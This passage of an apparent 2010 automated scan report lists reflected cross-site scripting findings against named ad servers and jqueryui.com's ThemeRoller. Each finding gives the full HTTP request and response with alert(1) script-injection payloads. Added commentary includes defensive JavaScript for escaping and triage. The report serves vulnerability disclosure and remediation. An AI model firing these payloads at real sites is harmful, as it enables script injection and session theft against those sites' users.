User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ib.adnxs.com
Proxy-Connection: Keep-Alive
Cookie: sess=1; anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNT6@0lh?1'4r(PA7vgjZ%ik>Crs)<5yw'L87xE/zK)*i9lX_S'5[U9t!s`RER.Iac'7T?$HphC)<J4)W=2G`+O4jGljh31voydy`Ra.W(lA.Gds=*e9!Qv?#pwV2sS:8+YKz$980X1vNaa; uuid2=5675696235378120575

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 16-Nov-2010 03:52:42 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNT6@0lh?1'4r(PA7vgj[d#fg0oR#5`nsErk%GqhtigT9)f>DjB6FhV*uTB.0![kr_sKgO4At=z:ML77B(ffw!8]^Kosf?jQq-cYSSs(-'ohOC2<ANw(R.Dum<-oIIzjELs-%v*0`u-wyg'1r6p7; path=/; expires=Sun, 13-Feb-2011 03:52:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: cdata=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: cdata00=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: cdata01=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 15 Nov 2010 03:52:42 GMT
Content-Length: 463

document.write('<a href="http://optimized-by.rubiconproject.com/t/5833/7750/0-9.3176628.3191651?url=30b7c'-alert(1)-'7a94292f04http%3A%2F%2Fwww.consumernews28.com%2Fdiet%2F%3Ft202id%3D23065%26t202kw%3D160x600" target="_blank">
...[SNIP]...

3.132. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14662/102883/728x90_theater.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 892af"%3balert(1)//60d6637fe36 was submitted in the mpck parameter. This input was echoed as 892af";alert(1)//60d6637fe36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
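The two reflection shapes this report shows for a double-quoted JavaScript string are `"-alert(1)-"` (3.125, echoed as submitted) and `"%3balert(1)//` (3.132 and 3.134, URL-decoded by the server before being echoed). The added example below is not code from the report or from any of the sites it covers: it builds a template modelled on the `s.prop4 = s.prop3 + " / ..."` assignment visible in the 3.125 response, runs both reflected values through it with `alert()` stubbed to record calls, and then repeats the run with a hypothetical `encodeForJsString` helper applied, which is the fix the remediation text is asking for when the value cannot simply be left out.

```javascript
// Added example, not code from the scan report or from the sites it covers. It
// reproduces the two reflection shapes the report shows for a double-quoted
// JavaScript string (3.125: "-alert(1)-" echoed as-is; 3.132/3.134:
// "%3balert(1)// echoed URL-decoded) against a template modelled on the
// s.prop4 assignment in the 3.125 response, then against the same template
// with an encoder applied. encodeForJsString is a hypothetical helper.

// Vulnerable: the request value is concatenated straight into script source.
function renderTrackingScriptVulnerable(value) {
  return 's.prop4 = s.prop3 + " / ' + value + '";';
}

// Encode a value for placement inside a quoted JS string literal: escape the
// backslash, both quote characters, < > / (so "</script>" cannot end the
// element) and the line terminators that would end the literal.
function encodeForJsString(value) {
  return String(value).replace(/[\\"'<>\/\r\n\t\u2028\u2029]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderTrackingScriptFixed(value) {
  return 's.prop4 = s.prop3 + " / ' + encodeForJsString(value) + '";';
}

// Run a generated script the way a browser would, with alert() stubbed so
// we can record whether the payload executed and what s.prop4 ended up as.
function execute(script) {
  const alertCalls = [];
  const s = { prop3: 'Home / Opinion / Forums' };
  new Function('s', 'alert', script)(s, (x) => { alertCalls.push(x); });
  return { alertCalls, prop4: s.prop4 };
}

// The reflected values from the report. The mpck one is URL-decoded first,
// matching the 'echoed as 892af";alert(1)//60d6637fe36' note in 3.132.
const REFLECTED = {
  restPath: 'xml/poll-linka4083"-alert(1)-"6c029440ed4',
  mpck: decodeURIComponent('altfarm.mediaplex.com%2Fad%2Fck%2F14662-102883-28901-13' +
    '%3Fmpt%3D6367786277892af"%3balert(1)//60d6637fe36'),
};

// Same value through both templates: the vulnerable one fires alert(1) and
// leaves s.prop4 as NaN (the string minus undefined); the fixed one keeps the
// whole value as data and never calls alert.
function compare(value) {
  return {
    vulnerable: execute(renderTrackingScriptVulnerable(value)),
    fixed: execute(renderTrackingScriptFixed(value)),
  };
}
```

The same escaping has to happen wherever the page is rendered, not in the browser; forums.mercurynews.com advertises PHP/5.2.6, and `json_encode()` only gained the `JSON_HEX_TAG`, `JSON_HEX_QUOT` and `JSON_HEX_APOS` flags in PHP 5.3, so on that version the character-by-character escaping above (or an upgrade) is what closes the hole. Note that the `-alert(1)-` form needs no statement terminator at all: the payload only has to end the string and be a valid operand, so filtering `;` alone would not help.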

Request

GET /content/0/14662/102883/728x90_theater.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14662-102883-28901-13%3Fmpt%3D6367786277892af"%3balert(1)//60d6637fe36&mpt=6367786277&mpvc=http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: img.mediaplex.com
Proxy-Connection: Keep-Alive
Cookie: svid=804356890302; mojo3=14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 01:37:45 GMT
Server: Apache
Last-Modified: Wed, 15 Sep 2010 00:48:45 GMT
ETag: "4205a9-d4f-49041b1141540"
Accept-Ranges: bytes
Content-Length: 7011
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,636778627
...[SNIP]...
=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/14662-102883-28901-13?mpt=6367786277892af";alert(1)//60d6637fe36\" target=\"_blank\">
...[SNIP]...

3.133. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14662/102883/728x90_theater.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44c0"><script>alert(1)</script>907f9db44a1 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14662/102883/728x90_theater.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14662-102883-28901-13%3Fmpt%3D6367786277c44c0"><script>alert(1)</script>907f9db44a1&mpt=6367786277&mpvc=http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: img.mediaplex.com
Proxy-Connection: Keep-Alive
Cookie: svid=804356890302; mojo3=14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 01:37:13 GMT
Server: Apache
Last-Modified: Wed, 15 Sep 2010 00:48:45 GMT
ETag: "4205a9-d4f-49041b1141540"
Accept-Ranges: bytes
Content-Length: 7197
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/14662-102883-28901-13?mpt=6367786277c44c0"><script>alert(1)</script>907f9db44a1" TARGET="_blank">
...[SNIP]...

3.134. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14662/102883/728x90_theater.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e58c7"%3balert(1)//4841a3488a4 was submitted in the mpvc parameter. This input was echoed as e58c7";alert(1)//4841a3488a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/14662/102883/728x90_theater.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14662-102883-28901-13%3Fmpt%3D6367786277&mpt=6367786277&mpvc=http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg=e58c7"%3balert(1)//4841a3488a4 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: img.mediaplex.com
Proxy-Connection: Keep-Alive
Cookie: svid=804356890302; mojo3=14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 01:45:50 GMT
Server: Apache
Last-Modified: Wed, 15 Sep 2010 00:48:45 GMT
ETag: "4205a9-d4f-49041b1141540"
Accept-Ranges: bytes
Content-Length: 6987
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,636778627
...[SNIP]...
\"FlashVars\" VALUE=\"clickTAG=http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg=e58c7";alert(1)//4841a3488a4http://altfarm.mediaplex.com%2Fad%2Fck%2F14662-102883-28901-13%3Fmpt%3D6367786277&clickTag=http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^
...[SNIP]...

3.135. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14662/102883/728x90_theater.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 715f3"><script>alert(1)</script>d0be7b9b1b0 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14662/102883/728x90_theater.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14662-102883-28901-13%3Fmpt%3D6367786277&mpt=6367786277&mpvc=http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg=715f3"><script>alert(1)</script>d0be7b9b1b0 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: img.mediaplex.com
Proxy-Connection: Keep-Alive
Cookie: svid=804356890302; mojo3=14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 01:44:57 GMT
Server: Apache
Last-Modified: Wed, 15 Sep 2010 00:48:45 GMT
ETag: "4205a9-d4f-49041b1141540"
Accept-Ranges: bytes
Content-Length: 7197
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg=715f3"><script>alert(1)</script>d0be7b9b1b0http://altfarm.mediaplex.com/ad/ck/14662-102883-28901-13?mpt=6367786277" TARGET="_blank">
...[SNIP]...

3.136. http://jqueryui.com/themeroller/ [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73316"><script>alert(1)</script>6045c0d1b5 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
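The findings in this section differ only in the context the reflection lands in: a double- or single-quoted JavaScript string (3.125, 3.131, 3.134), a double-quoted HTML attribute value (3.133, 3.136 and the other themeroller parameters), or plain text between tags (3.127 to 3.130). When triaging a report of this size it helps to have that classification reproducible. The added example below is not part of the report or any scanner: it locates a submitted payload in a response body, records whether it came back unmodified or URL-decoded (the `%3b` to `;` case), and names the context by tracking the unclosed `<script>`, tag and quote state before the reflection point. The sample bodies are shortened copies of the responses quoted in 3.125, 3.127, 3.131, 3.133 and 3.134; the `<script>` wrappers on the first and last are reconstructed, since the report snips them.

```javascript
// Added example, not part of the scan report: a triage helper that finds where a
// submitted payload is reflected in a response body and names the syntactic
// context the report's "Issue detail" paragraphs describe (JavaScript string in
// double or single quotes, double-quoted HTML attribute, text between tags),
// also recording whether the value came back unmodified or URL-decoded.
// The sample bodies are shortened from the responses quoted in findings 3.125,
// 3.127, 3.131, 3.133 and 3.134; the <script> wrappers on the first and last
// are reconstructed, because the report snips them.

// Quote character we are inside at the end of `text`, or null. Backslash
// escapes are honoured; comments and regex literals are not tracked.
function openQuoteAt(text) {
  let quote = null;
  for (let i = 0; i < text.length; i++) {
    const ch = text[i];
    if (quote) {
      if (ch === '\\') i++;                 // skip the escaped character
      else if (ch === quote) quote = null;
    } else if (ch === '"' || ch === "'") {
      quote = ch;
    }
  }
  return quote;
}

function classifyReflection(body, payload, contentType = 'text/html') {
  let index = body.indexOf(payload);
  let echoedAs = 'unmodified';
  if (index === -1) {                       // e.g. %3b echoed back as ';'
    try { index = body.indexOf(decodeURIComponent(payload)); } catch (e) { index = -1; }
    echoedAs = 'url-decoded';
  }
  if (index === -1) return { reflected: false };

  const before = body.slice(0, index);
  const lower = before.toLowerCase();
  const isScript = /javascript/i.test(contentType);
  const scriptOpen = lower.lastIndexOf('<script');
  let context;
  if (isScript || scriptOpen > lower.lastIndexOf('</script')) {
    // Inside script: the unclosed quote (if any) gives the string context.
    const start = isScript ? 0 : before.indexOf('>', scriptOpen) + 1;
    const q = openQuoteAt(before.slice(start));
    context = q === '"' ? 'js-string-double' : q === "'" ? 'js-string-single' : 'js-code';
  } else if (before.lastIndexOf('<') > before.lastIndexOf('>')) {
    // Inside a tag: an unclosed quote means an attribute value.
    const q = openQuoteAt(before.slice(before.lastIndexOf('<')));
    context = q === '"' ? 'html-attribute-double' : q === "'" ? 'html-attribute-single' : 'html-tag';
  } else {
    context = 'html-text';
  }
  return { reflected: true, index, echoedAs, context };
}

// Constructed samples, keyed by finding number, cut down from the report.
const SAMPLES = {
  '3.125': { payload: 'a4083"-alert(1)-"6c029440ed4', body:
    '<script language="JavaScript">\nif (typeof s != \'undefined\') {\n' +
    '   s.pageName="";\n   s.channel="Forums";\n   s.prop1="Home";\n' +
    '   s.prop2=s.prop1 + " / Opinion";\n   s.prop3=s.prop2 + " / Forums";\n' +
    '   s.prop4=s.prop3 + " / xml/poll-linka4083"-alert(1)-"6c029440ed4";\n' +
    '   s.prop9=getCiQueryString("SOURCE");\n}\n</script>' },
  '3.127': { payload: '11905<script>alert(1)</script>ed7f0af6221', body:
    '<H1>404 Not Found</H1>\n<pre>Resource /servlet11905<script>alert(1)</script>' +
    'ed7f0af6221/ajrotator/ not found</pre>\n<BR>\n' },
  '3.131': { payload: "30b7c'-alert(1)-'7a94292f04", contentType: 'text/javascript', body:
    'document.write(\'<a href="http://optimized-by.rubiconproject.com/t/5833/7750/' +
    '0-9.3176628.3191651?url=30b7c\'-alert(1)-\'7a94292f04http%3A%2F%2Fwww.consumernews28.com' +
    '%2Fdiet%2F" target="_blank">\');' },
  '3.133': { payload: 'c44c0"><script>alert(1)</script>907f9db44a1', body:
    '<NOSCRIPT>\n<a href="http://r1.ace.advertising.com/click/site=0000781318/optn=64?trg=' +
    'http://altfarm.mediaplex.com/ad/ck/14662-102883-28901-13?mpt=6367786277c44c0">' +
    '<script>alert(1)</script>907f9db44a1" TARGET="_blank">' },
  '3.134': { payload: 'e58c7"%3balert(1)//4841a3488a4', body:
    '<script>document.write("<PARAM NAME=\\"FlashVars\\" VALUE=\\"clickTAG=' +
    'http://r1.ace.advertising.com/click/site=0000781318/optn=64?trg=e58c7";alert(1)//' +
    '4841a3488a4http://altfarm.mediaplex.com%2Fad%2Fck%2F14662-102883-28901-13\\">");</script>' },
};

// Classify every sample; the result mirrors the report's per-finding wording.
function triage() {
  const out = {};
  for (const [id, s] of Object.entries(SAMPLES)) {
    out[id] = classifyReflection(s.body, s.payload, s.contentType);
  }
  return out;
}
```

The context decides the fix: a value in a JavaScript string needs JavaScript string escaping, a value in an attribute needs `"` (and `&`, `<`, `>`) entity-encoded, and text between tags needs `<` and `&` entity-encoded. The 3.134 sample also shows why a scanner reports `%3b` as echoed `;`: the quote tracker sees the server's own `\"` escapes as escapes, so the only way the payload's bare `"` can appear inside that literal is if the server decoded the parameter before writing it out unescaped.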

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a73316"><script>alert(1)</script>6045c0d1b5&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120127

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a73316"><script>alert(1)</script>6045c0d1b5&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55
...[SNIP]...

3.137. http://jqueryui.com/themeroller/ [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15638"><script>alert(1)</script>d1337495d25 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f715638"><script>alert(1)</script>d1337495d25&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ld&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f715638"><script>alert(1)</script>d1337495d25&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefau
...[SNIP]...

3.138. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51bf5"><script>alert(1)</script>5b6241fd956 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d851bf5"><script>alert(1)</script>5b6241fd956&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
